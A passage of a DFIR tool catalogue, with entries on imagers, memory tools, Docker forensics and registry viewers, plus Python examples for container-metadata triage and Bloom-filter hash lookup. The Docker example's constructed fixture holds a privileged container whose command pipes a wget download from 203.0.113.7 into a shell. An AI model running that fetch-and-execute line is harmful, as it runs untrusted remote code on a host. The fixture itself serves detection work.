What it does: dexter is Coinbase's framework for acquiring forensic artefacts from hosts. Source summaries describe it as: Dexter is a forensics acquisition framework designed to be extensible and secure. Read the repository's design notes before adopting it: who may request a collection and who may read the results is part of its security model, and that shapes how it fits your response process.

Operational value: Scripted, repeatable collection from many hosts is what makes large-scale triage feasible; the framework's value lies in that consistency and in controlling access to what is collected.

Typical deployment pattern: It runs on the hosts being investigated, with collections requested by investigators; pilot on a small set of hosts and confirm that the artefacts you need are covered by the existing collectors before extending it.

Selection considerations: Check the repository's maintenance status and release history carefully; an acquisition framework that stops receiving updates is a liability on production hosts. As an open-source option, teams usually evaluate maintainer activity, release cadence, and community response quality. Related source context: Awesome Forensics > Tools > Frameworks.

Back to Name Jump

dff

  • Website: https://github.com/arxsys/dff
  • Model: Open Source
  • Category: Digital Forensics & DFIR
  • Source Lists: Awesome Forensics

What it does: dff (Digital Forensics Framework) is a modular forensic framework from ArxSys with both a command-line and a graphical interface, written in Python and C++. Source summaries describe it as: Forensic framework. It covers disk image handling, file system parsing and artefact modules, with a scripting API for automation.

Operational value: A framework with a common data model lets one investigation span disk, file system and application artefacts without exporting between tools.

Typical deployment pattern: Install on the examination workstation and run it against images; it is not an agent.

Selection considerations: Development has been dormant for years, so expect gaps in support for current file systems and operating systems and treat it as a reference or a source of parsers rather than a primary platform. Related source context: Awesome Forensics > Tools > Frameworks.

Back to Name Jump

DFIR

  • Website: https://www.sans.org/cyber-security-summit/archives/dfir
  • Model: Open Source
  • Category: Digital Forensics & DFIR
  • Source Lists: Awesome Threat Detection

What it does: Not a tool: this is the archive of SANS summit presentations on threat hunting, blue teaming and DFIR. Source summaries describe it as: Threat hunting, Blue Team and DFIR summit slides.

Operational value: The slide decks document current techniques, artefacts and case studies from practitioners; useful for analyst training and for checking that your own procedures reflect current practice.

Typical deployment pattern: Nothing to deploy.

Selection considerations: Check the date of any deck before relying on its artefact details, since operating system and application formats change. Related source context: Awesome Threat Detection and Hunting > Resources.

Back to Name Jump

DFIR-ORC

  • Website: https://github.com/dfir-orc
  • Model: Open Source
  • Category: Digital Forensics & DFIR
  • Source Lists: Awesome SOC

What it does: DFIR-ORC (Outil de Recherche de Compromission) is the forensic artefact collection tool published by ANSSI, the French national cybersecurity agency, for Windows systems. The source list gives no description. It is a single configurable executable that collects files, registry hives, event logs, NTFS metadata and the output of embedded tools from a running Windows host and packages them into archives for offline analysis.

Operational value: It is built to be run at scale across an estate during a suspected compromise and to return the same artefact set from every host, which is what a CSIRT needs when triage must cover hundreds of machines.

Typical deployment pattern: Build an ORC binary configured for your environment (the XML configuration decides what is collected), distribute it through your software deployment channel or by manual execution, and gather the produced archives centrally for parsing.

Selection considerations: Windows-only; the build and configuration step is heavier than for point tools, so budget time to tune the collection profile and to confirm the output parses in your analysis pipeline. As an open-source option, teams usually evaluate maintainer activity, release cadence, and community response quality. Related source context: Mission-critical means (tools/sensors) > Critical tools for CSIRT.

Back to Name Jump

Digital Forensic Challenge Images

  • Website: https://www.ashemery.com/dfir.html
  • Model: Open Source
  • Category: Digital Forensics & DFIR
  • Source Lists: Awesome Forensics

What it does: Two DFIR challenges with downloadable evidence images, published by Ali Hadi. Source summaries describe it as: Two DFIR challenges with images. Training material, not a tool.

Operational value: Realistic practice cases for timeline building and artefact analysis; also useful as known inputs when validating a new tool or a new analyst.

Typical deployment pattern: Nothing to deploy; download the images and work them on an examination workstation.

Selection considerations: Not applicable beyond confirming the downloaded images are complete before investing time in them. Related source context: Awesome Forensics > Resources > File System Corpora.

Back to Name Jump

Digital Forensics Tool Testing Images

  • Website: https://sourceforge.net/projects/dftt/
  • Model: Open Source
  • Category: Digital Forensics & DFIR
  • Source Lists: Awesome Forensics

What it does: Digital Forensics Tool Testing Images (DFTT) is Brian Carrier's set of small disk images with documented contents, created for testing the correctness of forensic tools: deleted-file recovery on FAT and NTFS, keyword searches across fragmented files, partition table handling and similar cases. The source list gives no description.

Operational value: Tool validation. Before a tool's output goes into a report you should know how it behaves on a case whose answer is known; documented validation is what makes "legal-quality reporting" defensible.

Typical deployment pattern: Keep the images beside your tool set, re-run them whenever a forensic tool is upgraded, and record the results.

Selection considerations: The images are old and cover classic file systems; supplement them with newer corpora for modern systems. Related source context: Awesome Forensics > Resources > File System Corpora.

Back to Name Jump

Disk Arbitrator

  • Website: https://github.com/aburgh/Disk-Arbitrator
  • Model: Open Source
  • Category: Digital Forensics & DFIR
  • Source Lists: Awesome Forensics

What it does: Disk Arbitrator is a macOS utility that acts as a software write blocker: it intercepts the system's disk arbitration so that newly attached devices are either not mounted at all or mounted read-only, instead of being mounted read-write automatically. Source summaries describe it as: A Mac OS X forensic utility designed to help the user ensure correct forensic procedures are followed during imaging of a disk device.

Operational value: Prevents the examiner's own workstation from writing to evidence (macOS otherwise creates its own index and metadata folders on a freshly mounted writable volume) and so from invalidating the hash taken at acquisition.

Typical deployment pattern: Start it and set it to block or read-only mode before attaching the evidence device; image the device and verify hashes before it is mounted anywhere writable.

Selection considerations: It is a software control, not a replacement for a hardware write blocker where one is mandated, and updates have been infrequent, so test it on your macOS version before relying on it. Related source context: Awesome Forensics > Tools > Disk image handling.

Back to Name Jump

Docker Explorer

  • Website: https://github.com/google/docker-explorer
  • Model: Open Source
  • Category: Digital Forensics & DFIR
  • Source Lists: Awesome Forensics

What it does: Docker Explorer, from Google, works on a disk image of a Docker host that has been mounted on the examination system: it reads the Docker data directory (by default /var/lib/docker) to list containers and images, show container configuration and reassemble a container's layered file system so it can be mounted and examined. Source summaries describe it as: Extracts and interprets forensic artifacts from disk images of Docker Host systems.

Operational value: Container evidence is scattered across layer directories and JSON metadata that ordinary file system tools do not interpret; reconstructing the view the container actually had is a prerequisite for finding what ran in it.

Typical deployment pattern: Mount the host image read-only on a Linux examination system, point the tool at the mounted Docker directory, enumerate containers, then mount the container of interest at a separate path for analysis.

Selection considerations: Check support for the storage driver used by the host (overlay2 is the common case) and for the Docker version, since the container metadata layout has changed across releases. As an open-source option, teams usually evaluate maintainer activity, release cadence, and community response quality. Related source context: Awesome Forensics > Tools > Docker Forensics.

Back to Name Jump

dof (Docker Forensics Toolkit)

  • Website: https://github.com/docker-forensics-toolkit/toolkit
  • Model: Open Source
  • Category: Digital Forensics & DFIR
  • Source Lists: Awesome Forensics

What it does: dof (Docker Forensics Toolkit) is a Python command-line tool with the same purpose as Docker Explorer: it reads the Docker data directory of a mounted host image to report on images, containers, their configuration and logs. Source summaries describe it as: Extracts and interprets forensic artifacts from disk images of Docker Host systems.

Operational value: As with Docker Explorer, it turns the host's container metadata and layer storage into something an analyst can read and time-order without a running Docker daemon.

Typical deployment pattern: Mount the host image read-only, point the tool at the Docker directory and enumerate before drilling into individual containers.

Selection considerations: Run it and Docker Explorer against the same image and compare; differences in what each parses are a useful check on both. As an open-source option, teams usually evaluate maintainer activity, release cadence, and community response quality. Related source context: Awesome Forensics > Tools > Docker Forensics.
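One slice of what Docker Explorer and dof do, as an added example written for this page (not code from either project): reading the per-container config.v2.json and hostconfig.json files under the Docker data directory of a mounted host image and turning them into a container list, a timeline and a shortlist of containers with dangerous settings. Layer reconstruction and container mounting, the harder part, are left to the tools. The field names are those Docker itself writes in these files; the sample host directory, container IDs, names and timestamps are constructed in a temp directory.

```python
"""Triage of Docker container metadata from a mounted host image.

Added example, not Docker Explorer or dof code. It reads
<mount>/var/lib/docker/containers/<id>/config.v2.json and hostconfig.json,
the files Docker writes for every container, and summarises them. The
sample host built at the end is constructed.
"""
import json
import os
import tempfile

DOCKER_DIR = os.path.join("var", "lib", "docker")
# Host paths whose bind-mount into a container amounts to host takeover.
SENSITIVE_HOST_PATHS = {"/", "/etc", "/root", "/proc", "/sys",
                        "/var/run/docker.sock", "/run/docker.sock"}


def _load_json(path):
    if not os.path.isfile(path):
        return {}
    with open(path) as f:
        return json.load(f)


def summarize(cid, cfg, host):
    """Reduce Docker's verbose JSON to the fields an investigator asks first."""
    binds = host.get("Binds") or []
    risky = [b for b in binds if b.split(":")[0] in SENSITIVE_HOST_PATHS]
    return {
        "id": cid[:12],
        "name": (cfg.get("Name") or "").lstrip("/"),
        "image": (cfg.get("Config") or {}).get("Image"),
        "created": cfg.get("Created"),
        "started": (cfg.get("State") or {}).get("StartedAt"),
        "cmd": [cfg.get("Path")] + list(cfg.get("Args") or []),
        "privileged": bool(host.get("Privileged")),
        "risky_binds": risky,
    }


def list_containers(mount_root):
    """Enumerate containers from <mount_root>/var/lib/docker/containers."""
    base = os.path.join(mount_root, DOCKER_DIR, "containers")
    result = []
    if not os.path.isdir(base):
        return result
    for cid in sorted(os.listdir(base)):
        cdir = os.path.join(base, cid)
        cfg = _load_json(os.path.join(cdir, "config.v2.json"))
        if not cfg:
            continue  # not a container directory, or metadata missing
        host = _load_json(os.path.join(cdir, "hostconfig.json"))
        result.append(summarize(cid, cfg, host))
    return result


def suspicious(containers):
    """Names of containers that are privileged or bind sensitive host paths."""
    return sorted(c["name"] for c in containers
                  if c["privileged"] or c["risky_binds"])


def timeline(containers):
    """(timestamp, event, name) tuples for the case timeline. Docker writes
    RFC 3339 UTC timestamps, so string order is time order; a StartedAt of
    year 0001 is Docker's zero value for a container that never started."""
    events = []
    for c in containers:
        if c["created"]:
            events.append((c["created"], "container_created", c["name"]))
        if c["started"] and not c["started"].startswith("0001-"):
            events.append((c["started"], "container_started", c["name"]))
    return sorted(events)


def build_sample_host():
    """Constructed mounted-image root holding two containers; returns its path."""
    root = tempfile.mkdtemp(prefix="dockerhost_")
    web_id, bad_id = "0123456789abcdef" * 4, "fedcba9876543210" * 4
    samples = {
        web_id: ({"ID": web_id, "Name": "/web", "Created": "2024-03-01T10:00:00.000000000Z",
                  "Path": "nginx", "Args": ["-g", "daemon off;"],
                  "Config": {"Image": "nginx:1.25"},
                  "State": {"Running": True, "StartedAt": "2024-03-01T10:00:01.000000000Z"}},
                 {"Privileged": False, "Binds": ["/srv/www:/usr/share/nginx/html:ro"]}),
        bad_id: ({"ID": bad_id, "Name": "/miner", "Created": "2024-03-02T01:13:37.000000000Z",
                  "Path": "/bin/sh", "Args": ["-c", "wget -qO- http://203.0.113.7/x | sh"],
                  "Config": {"Image": "alpine:latest"},
                  "State": {"Running": True, "StartedAt": "2024-03-02T01:13:38.000000000Z"}},
                 {"Privileged": True,
                  "Binds": ["/:/host", "/var/run/docker.sock:/var/run/docker.sock"]}),
    }
    for cid, (cfg, host) in samples.items():
        cdir = os.path.join(root, DOCKER_DIR, "containers", cid)
        os.makedirs(cdir)
        with open(os.path.join(cdir, "config.v2.json"), "w") as f:
            json.dump(cfg, f)
        with open(os.path.join(cdir, "hostconfig.json"), "w") as f:
            json.dump(host, f)
    return root


if __name__ == "__main__":
    found = list_containers(build_sample_host())
    for ts, event, name in timeline(found):
        print(ts, event, name)
    print("suspicious:", suspicious(found))
```

On a real case, mount_root is the mount point of the read-only host image (for example the path you mounted the root file system at); the container's own stdout/stderr, when the default json-file log driver was in use, sits beside these files as <id>-json.log, one JSON object per line, and belongs in the same timeline.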

Back to Name Jump

Letter E

This letter section contains 1 tool.

Extundelete

  • Website: http://extundelete.sourceforge.net/
  • Model: Open Source
  • Category: Digital Forensics & DFIR
  • Source Lists: Awesome CTF

What it does: Extundelete recovers deleted files from ext3 and ext4 file systems by reading the journal for earlier copies of inode and directory blocks and restoring the data blocks they point to. Source summaries describe it as: Used for recovering lost data from mountable images. It works on an unmounted partition or on an image file; it must never be pointed at a mounted file system.

Operational value: Recovering recently deleted files from a Linux image (logs, scripts, staged data) is a routine DFIR need, and journal-based recovery works where no file-carving signature applies.

Typical deployment pattern: Run it against a copy of the image; recovered files are written to a RECOVERED_FILES directory in the current working directory. Restore everything or narrow the run by file path or by deletion time window, then hash what you recover.

Selection considerations: Recovery depends on the journal still holding the relevant metadata, so on busy or long-running systems, and where ext4 extents have been reused, results can be partial. The project has not seen a release in many years, so verify that it still builds against the e2fsprogs libraries on your workstation. Related source context: Solve > Forensics.

Back to Name Jump

Letter F

This letter section contains 13 tools.

FireEye Memoryze

  • Website: https://fireeye.market/apps/211368
  • Model: Free, proprietary
  • Category: Digital Forensics & DFIR
  • Source Lists: Awesome Forensics

What it does: FireEye Memoryze (originally a Mandiant tool) acquires and analyses Windows physical memory: it can image RAM, dump a process's address space, and enumerate processes, drivers, handles, hooks and network connections from a live system or from an acquired image. Source summaries describe it as: A free memory forensic software.

Operational value: Memory is where injected code, unpacked malware and live network state are visible; a tool that handles both acquisition and first-pass analysis shortens triage.

Typical deployment pattern: Run from removable media on the live Windows host to acquire memory, then analyse offline. Acquisition itself alters memory, so record the time, the tool version and the command used in the case notes.

Selection considerations: It is free but closed-source, and the FireEye and Mandiant product lines have since changed ownership, so confirm the download is still available and supported for current Windows versions before standardising on it; open-source alternatives exist elsewhere in this catalogue. Related source context: Awesome Forensics > Tools > Acquisition.

Back to Name Jump

FIT

  • Website: https://github.com/fit-project/fit
  • Model: Open Source
  • Category: Digital Forensics & DFIR
  • Source Lists: Awesome Forensics

What it does: FIT (Freezing Internet Tool) acquires online content as evidence: web pages, emails, social media and similar sources. Source summaries describe it as: Forensic acquisition of web pages, emails, social media, etc. Alongside the content it records the acquisition session (screenshots and the network traffic) and hashes and timestamps the results, so the capture can be shown to be what was seen at the time.

Operational value: An ordinary "save page" is easy to challenge; a tool that records how the content was obtained and seals the result is what makes online evidence usable in proceedings.

Typical deployment pattern: Run on a clean examination workstation with a known network path, capture each source as a separate case, and store the output with the case file.

Selection considerations: Check which sources are supported and whether its timestamping and hashing output meets the evidential expectations of your jurisdiction. As an open-source option, teams usually evaluate maintainer activity, release cadence, and community response quality. Related source context: Awesome Forensics > Tools > Acquisition.

Back to Name Jump

Forensic challenges

  • Website: https://www.amanhardikar.com/mindmaps/ForensicChallenges.html
  • Model: Open Source
  • Category: Digital Forensics & DFIR
  • Source Lists: Awesome Forensics

What it does: Aman Hardikar's mind map of forensic challenges and CTFs, a reference page rather than a tool. Source summaries describe it as: Mindmap of forensic challenges.

Operational value: A quick way to find practice material by topic when planning analyst training.

Typical deployment pattern: Nothing to deploy.

Selection considerations: Some linked challenges may no longer be hosted; check a link before scheduling it. Related source context: Awesome Forensics > Learn Forensics.

Back to Name Jump

ForensicPosters

  • Website: https://github.com/Invoke-IR/ForensicPosters
  • Model: Open Source
  • Category: Digital Forensics & DFIR
  • Source Lists: Awesome Forensics

What it does: Invoke-IR's posters of on-disk file system structures (NTFS among them), reference material rather than a tool. Source summaries describe it as: Posters of file system structures.

Operational value: Handy at the hex editor when a parser disagrees with what you see on disk, and for teaching how the artefacts that tools report are actually laid out.

Typical deployment pattern: Nothing to deploy.

Selection considerations: Check the poster's date against the file system version you are examining. Related source context: Awesome Forensics > Resources > Other.

Back to Name Jump

Forensics

  • Website: https://github.com/Cugu/awesome-forensics
  • Model: Open Source
  • Category: Digital Forensics & DFIR
  • Source Lists: Awesome Malware Analysis, Awesome Penetration Testing

What it does: The awesome-forensics curated list itself, which is also the "Awesome Forensics" source behind many entries in this catalogue. The source lists give no description beyond the link.

Operational value: A maintained index of forensic tools and resources; useful for finding candidates before they appear in a catalogue like this one.

Typical deployment pattern: Nothing to deploy.

Selection considerations: Inclusion in the list is not an endorsement of maintenance or correctness; apply the evaluation checklist at the top of this page to anything you pick from it. Related source context: Awesome Penetration Testing > Online Resources > Other Lists Online.

Back to Name Jump

Forensics CTFs

  • Website: https://github.com/apsdehal/awesome-ctf/blob/master/README.md#forensics
  • Model: Open Source
  • Category: Digital Forensics & DFIR
  • Source Lists: Awesome Forensics

What it does: The Forensics section of the awesome-ctf README, a list of CTF-oriented forensic tools and practice material rather than a tool. The source list gives no description.

Operational value: A starting point for practice material and for quick tools used in forensics challenges.

Typical deployment pattern: Nothing to deploy.

Selection considerations: Tools listed for CTF use are often unmaintained or unsuited to evidence handling; validate anything before it touches a real case. Related source context: Awesome Forensics > Learn Forensics > CTFs and Challenges.

Back to Name Jump

Forensics StartMe by Stark 4N6

  • Website: https://startme.stark4n6.com
  • Model: Open Source
  • Category: Digital Forensics & DFIR
  • Source Lists: Awesome Forensics

What it does: A start.me dashboard of DFIR links (tools, blogs, research and training) curated by Kevin Pagano, who publishes as Stark 4N6. Reference material, not a tool. The source list gives no description.

Operational value: A frequently updated map of the field that saves analysts from maintaining their own link collections.

Typical deployment pattern: Nothing to deploy.

Selection considerations: Not applicable. Related source context: Awesome Forensics > Resources > Web.

Back to Name Jump

Forensics tools on Wikipedia

  • Website: https://en.wikipedia.org/wiki/List_of_digital_forensics_tools
  • Model: Open Source
  • Category: Digital Forensics & DFIR
  • Source Lists: Awesome Forensics

What it does: The Wikipedia list of digital forensics tools, a reference page rather than a tool. The source list gives no description.

Operational value: Broad coverage of commercial and open-source tools across disk, memory, mobile and network forensics, useful for an initial shortlist.

Typical deployment pattern: Nothing to deploy.

Selection considerations: Licensing and maintenance details on the page can be stale; confirm them against the vendor or repository. Related source context: Awesome Forensics > Tools.

Back to Name Jump

ForensicsFocus

  • Website: https://www.forensicfocus.com/
  • Model: Open Source
  • Category: Digital Forensics & DFIR
  • Source Lists: Awesome Forensics

What it does: Forensic Focus (listed here as ForensicsFocus) is a digital forensics news and community site with articles, forums, webinars and job listings. Reference material, not a tool. The source list gives no description.

Operational value: Keeps analysts current on tool releases, research and case law; the forums are a place to ask about artefacts the documentation does not cover.

Typical deployment pattern: Nothing to deploy.

Selection considerations: Not applicable. Related source context: Awesome Forensics > Resources > Web.

Back to Name Jump

FRED

  • Website: https://www.pinguin.lu/fred
  • Model: Open Source
  • Category: Digital Forensics & DFIR
  • Source Lists: Awesome Forensics

What it does: FRED (Forensic Registry EDitor) is a cross-platform viewer and editor for Microsoft Windows registry hive files. Source summaries describe it as: Cross-platform Microsoft registry hive editor. It opens hives exported from a system or carved from an image, shows keys and values with a hex view and key last-write timestamps, and supports report templates for common artefacts.

Operational value: Registry hives hold much of the Windows user and system timeline (USB device history, run keys, recent documents, network profiles); a viewer that works directly on exported hives avoids loading them on a live Windows system.

Typical deployment pattern: Export the hives (SYSTEM, SOFTWARE, SAM, SECURITY and each user's NTUSER.DAT and UsrClass.dat) from the image, open copies in FRED, and run the report templates for standard artefacts before manual review.

Selection considerations: Because it is an editor as well as a viewer, work on copies and keep the originals hashed; compare its handling of transaction logs and dirty hives with dedicated registry parsers before relying on it for those cases. As an open-source option, teams usually evaluate maintainer activity, release cadence, and community response quality. Related source context: Awesome Forensics > Tools > Windows Artifacts.

Back to Name Jump

Fsck.ext4

  • Website: http://linux.die.net/man/8/fsck.ext3
  • Model: Open Source
  • Category: Digital Forensics & DFIR
  • Source Lists: Awesome CTF

What it does: fsck.ext4 (e2fsck, the same program behind the fsck.ext3 manual page linked above) checks and repairs ext2, ext3 and ext4 file systems. Source summaries describe it as: Used to fix corrupt filesystems. Its repairs rewrite file system metadata, so it is a recovery tool for working copies, not an examination tool for evidence.

Operational value: In CTFs and data recovery it makes a corrupted image mountable so that files can be read; in an investigation the same capability is a hazard, because a repaired image no longer hashes the same as the acquired one.

Typical deployment pattern: Never run it on the original image. Copy the image, run it with -n first (open read-only and answer no to every repair) to see what it would change, then repair the copy only if the metadata is worth rebuilding, documenting each step.

Selection considerations: It ships with e2fsprogs on every Linux distribution; the consideration is procedural rather than about the tool. Related source context: Solve > Forensics.

Back to Name Jump

FTK Imager

  • Website: https://www.exterro.com/digital-forensics-software/ftk-imager
  • Model: Free, proprietary
  • Category: Digital Forensics & DFIR
  • Source Lists: Awesome Forensics

What it does: FTK Imager is Exterro's (formerly AccessData's) free imaging tool for Windows. Source summaries describe it as: Free imaging tool for Windows. It creates disk images in raw (dd), E01 and AFF formats, captures physical memory, mounts images read-only, previews files, and computes and verifies MD5 and SHA-1 hashes of the acquired image.

Operational value: The de facto standard free imager in Windows-centric labs; its E01 output carries the acquisition metadata and hashes that downstream analysis tools expect.

Typical deployment pattern: Run from removable media or an examination workstation, through a write blocker where the evidence is a physical device; verify the hash after acquisition and keep the generated acquisition log with the image.

Selection considerations: It is free to use but closed-source, so the usual open-source maintainer criteria do not apply; check the licence terms and the current download location, which has moved with the product's ownership. Related source context: Awesome Forensics > Tools > Imaging.

Back to Name Jump

Fuji

  • Website: https://github.com/Lazza/Fuji/
  • Model: Open Source
  • Category: Digital Forensics & DFIR
  • Source Lists: Awesome Forensics

What it does: Fuji is an acquisition tool for Apple computers. The source summary describes it as: macOS forensic acquisition made simple; it creates full file system copies or targeted collections of Mac computers.

Operational value: A logical collection taken on the live machine is often the only practical option on modern Macs, where the APFS volume is encrypted and the internal storage cannot simply be removed and imaged.

Typical deployment pattern: Run it on the target Mac from an admin account with the acquiring tool granted Full Disk Access, writing to external storage that is hashed afterwards. Decide up front between a full copy and a targeted collection: the targeted option is faster but leaves data behind that cannot be collected later if the machine is wiped or returned.

Selection considerations: Track compatibility with current macOS releases, since Apple changes file system layout and privacy controls between versions. Related source context: Awesome Forensics > Tools > Acquisition.

Back to Name Jump

Letter G

This letter section contains 3 tools.

Ghiro

  • Website: https://github.com/Ghirensics/ghiro
  • Model: Open Source
  • Category: Digital Forensics & DFIR
  • Source Lists: Awesome Forensics

What it does: Ghiro is a web application for image forensics. The source summary describes it as: a fully automated tool designed to run forensics analysis over a massive amount of images. It extracts metadata (EXIF, embedded GPS coordinates, MIME details), matches hashes against a supplied list and presents the results for review in a browser.

Operational value: Batch metadata extraction turns a large photo set into searchable, timestamped and geolocated records, which is what an investigator needs before looking at any single picture.

Typical deployment pattern: Deploy it as a standalone server on the analysis network, feed it the image set, and export the results to the case file. Its own database holds case material and needs the same access control as the evidence.

Selection considerations: Check the repository for recent commits before adopting it; an image parser with stale dependencies is itself a risk when it is fed attacker-controlled files. Related source context: Awesome Forensics > Tools > Picture Analysis.

Back to Name Jump

Grafeas

  • Website: https://grafeas.io/
  • Model: Open Source
  • Category: Digital Forensics & DFIR
  • Source Lists: Awesome Cybersecurity Blue Team

What it does: Grafeas is a software supply chain metadata API, not a forensics tool; it is listed here because the Blue Team list files it under supply chain security. The source summary describes it as: open artifact metadata API to audit and govern your software supply chain. It stores notes (vulnerability, build, attestation, deployment and similar types) and occurrences that tie a note to a specific artifact by digest.

Operational value: During an incident involving a deployed container or package, a populated Grafeas store answers provenance questions quickly: which build produced this digest, which scans and attestations it carries, and where it was deployed.

Typical deployment pattern: Build and deployment pipelines must write notes and occurrences consistently; a store that is only partially populated gives false confidence in an investigation.

Selection considerations: Evaluate it as supply chain infrastructure (pipeline integration, policy enforcement such as admission control) rather than against DFIR criteria. Related source context: Awesome Cybersecurity Blue Team > DevSecOps > Supply chain security.

Back to Name Jump

Guymager

  • Website: https://sourceforge.net/projects/guymager/
  • Model: Open Source
  • Category: Digital Forensics & DFIR
  • Source Lists: Awesome Forensics

What it does: Guymager is a graphical disk imager for Linux. The source summary describes it as: open source disk imaging tool for Linux systems. It writes raw (dd), E01 and AFF images, is multi-threaded for speed, and computes MD5, SHA-1 and SHA-256 during acquisition with an optional verification pass that re-reads the finished image.

Operational value: The acquisition log it produces (device details, hashes, duration, read errors) is the document that later lets you show the image matches the source.

Typical deployment pattern: Run it from a forensic Linux boot environment or an analysis workstation with the source drive behind a write blocker, and enable verification so the image is re-hashed after it is written.

Selection considerations: A small project, so compare its release dates with your distribution's package; the image formats are standard, so switching imagers later costs nothing. Related source context: Awesome Forensics > Tools > Imaging.

Back to Name Jump

Letter H

This letter section contains 3 tools.

hashlookup-forensic-analyser

  • Website: https://github.com/hashlookup/hashlookup-forensic-analyser
  • Model: Open Source
  • Category: Digital Forensics & DFIR
  • Source Lists: Awesome Forensics

What it does: hashlookup-forensic-analyser separates known from unknown files in an acquisition. The source summary describes it as: a tool to analyse files from a forensic acquisition to find known/unknown hashes from API or using a local Bloom filter. It hashes every file and checks the hash against the hashlookup service or against a locally downloaded Bloom filter of known hashes.

Operational value: Eliminating operating system and common application files by hash reduces the set an analyst must look at from millions of files to a manageable residue of unknowns.

Typical deployment pattern: Point it at a mounted image or a copied tree and export the unknown list for review. Querying the API sends file hashes to a third party, which reveals which files exist on the evidence; the Bloom filter mode keeps the lookup offline.

Selection considerations: The filter is only as good as its freshness, so schedule updates, and remember that a Bloom filter can report a false "known" but never a false "unknown". Related source context: Awesome Forensics > Tools > Frameworks.
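The offline workflow described above, as an added example that is not hashlookup-forensic-analyser's own code: a Bloom filter is built from a hash set of known files, every file under an acquired tree is SHA-1 hashed and checked against it, and the tree is split into known and unknown. The known set, the sample tree and the file names are constructed for this illustration, not a real NSRL or hashlookup export.

```python
"""Known-file triage with a local Bloom filter.

Added example, not hashlookup-forensic-analyser's code. Load a hash set of
known files into a Bloom filter, SHA-1 every file in an acquisition, and
split the tree into "known" (hit, deprioritise) and "unknown" (miss, review).
KNOWN_FILES and UNKNOWN_FILES are constructed stand-ins for real content.
"""
import hashlib
import math
import os
import shutil
import tempfile


class BloomFilter:
    """Bit array plus k derived positions. A miss is definitive; a hit is
    wrong with probability about (1 - e^(-k*n/m))^k, so 'known' can be a
    false positive but 'unknown' never is."""

    def __init__(self, expected_items, false_positive_rate=1e-6):
        n = max(1, expected_items)
        # Standard sizing: m = -n ln p / (ln 2)^2 bits, k = (m / n) ln 2 hashes.
        self.m = max(8, math.ceil(-n * math.log(false_positive_rate) / (math.log(2) ** 2)))
        self.k = max(1, round(self.m / n * math.log(2)))
        self.bits = bytearray((self.m + 7) // 8)

    def _positions(self, key):
        # Double hashing (Kirsch-Mitzenmacher): k positions from the two
        # 64-bit halves of one SHA-256 over the lowercase hex digest string.
        digest = hashlib.sha256(key.lower().encode()).digest()
        h1 = int.from_bytes(digest[:8], "big")
        h2 = int.from_bytes(digest[8:16], "big") | 1
        return [(h1 + i * h2) % self.m for i in range(self.k)]

    def add(self, key):
        for pos in self._positions(key):
            self.bits[pos >> 3] |= 1 << (pos & 7)

    def __contains__(self, key):
        return all(self.bits[pos >> 3] & (1 << (pos & 7)) for pos in self._positions(key))


def sha1_file(path, chunk_size=1 << 20):
    """Known-file sets are commonly keyed by SHA-1; stream the file."""
    digest = hashlib.sha1()
    with open(path, "rb") as handle:
        for block in iter(lambda: handle.read(chunk_size), b""):
            digest.update(block)
    return digest.hexdigest()


def classify_tree(root, known):
    """Walk an acquired directory tree; map relative path -> 'known'/'unknown'."""
    verdicts = {}
    for dirpath, _, filenames in os.walk(root):
        for name in filenames:
            full = os.path.join(dirpath, name)
            rel = os.path.relpath(full, root).replace(os.sep, "/")
            verdicts[rel] = "known" if sha1_file(full) in known else "unknown"
    return verdicts


# Constructed stand-ins; a real known set would come from NSRL or hashlookup.
KNOWN_FILES = {
    "Windows/System32/kernel32.dll": b"constructed stand-in for a known OS binary\n",
    "Windows/System32/ntdll.dll": b"constructed stand-in for another known binary\n",
}
UNKNOWN_FILES = {
    "Users/bob/Downloads/invoice.exe": b"constructed stand-in for a dropped executable\n",
    "Users/bob/notes.txt": b"meeting at 10\n",
}


def build_known_filter():
    """Populate the filter from the SHA-1 of each known file's content."""
    bloom = BloomFilter(expected_items=len(KNOWN_FILES))
    for content in KNOWN_FILES.values():
        bloom.add(hashlib.sha1(content).hexdigest())
    return bloom


def demo():
    """Materialise the constructed tree in a temp dir, classify it, clean up."""
    root = tempfile.mkdtemp()
    for rel, content in {**KNOWN_FILES, **UNKNOWN_FILES}.items():
        full = os.path.join(root, *rel.split("/"))
        os.makedirs(os.path.dirname(full), exist_ok=True)
        with open(full, "wb") as handle:
            handle.write(content)
    verdicts = classify_tree(root, build_known_filter())
    shutil.rmtree(root)
    for rel in sorted(verdicts):
        print(f"{verdicts[rel]:8} {rel}")
    return verdicts


if __name__ == "__main__":
    demo()
```

The false-positive rate is a design parameter: a filter sized for 1e-6 over a multi-million-entry set is tens of megabytes, which is why the offline mode is viable on an analysis workstation without sending hashes anywhere.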

Back to Name Jump

Hashment

  • Website: https://github.com/hashment/yaffs2-forensic-tool
  • Model: Open Source
  • Category: Digital Forensics & DFIR
  • Source Lists: Awesome Forensics

What it does: Hashment is a Python tool for YAFFS2, the flash file system used on early Android devices. The source summary describes it as: Python forensic tool to analyze, dump, and recover deleted files from YAFFS2 partitions.

Operational value: YAFFS2 is log-structured, so earlier versions of a file remain on flash until garbage collection reclaims them; a parser that understands the chunk and object headers can recover content that a mounted view no longer shows.

Typical deployment pattern: Run it against a raw NAND dump of the partition, including the spare/OOB areas where the dump format preserves them, never against a live device.

Selection considerations: A niche tool for an older platform; confirm it parses your specific dump layout on a known sample before relying on it. Related source context: Awesome Forensics > Tools > Acquisition.

Back to Name Jump

hollows_hunter

  • Website: https://github.com/hasherezade/hollows_hunter
  • Model: Open Source
  • Category: Digital Forensics & DFIR
  • Source Lists: Awesome Threat Detection

What it does: hollows_hunter is a Windows live-response scanner built on PE-sieve. The source summary describes it as: scans all running processes, recognizes and dumps a variety of potentially malicious implants (replaced/implanted PEs, shellcodes, hooks, in-memory patches).

Operational value: It finds the in-memory tampering that file-based scanning misses, such as a hollowed process or an executable region with no backing file, and writes the dumped material to disk for analysis.

Typical deployment pattern: Run it on the suspect host with administrative rights as a documented live-response step; record that the scan adds a process and writes dump files, and take a memory image first if one is also wanted.

Selection considerations: Expect findings on legitimate software that hooks or patches in memory (security products, some application frameworks), so baseline a clean host before results are used for escalation. Related source context: Awesome Threat Detection and Hunting > Tools.

Back to Name Jump

Letter I

This letter section contains 8 tools.

IE10Analyzer

  • Website: https://github.com/moaistory/IE10Analyzer
  • Model: Open Source
  • Category: Digital Forensics & DFIR
  • Source Lists: Awesome Forensics

What it does: IE10Analyzer parses the ESE database that Internet Explorer 10 and later (and Windows itself) use for browsing history, cache and cookie records. The source summary describes it as: this tool can parse normal records and recover deleted records in WebCacheV01.dat.

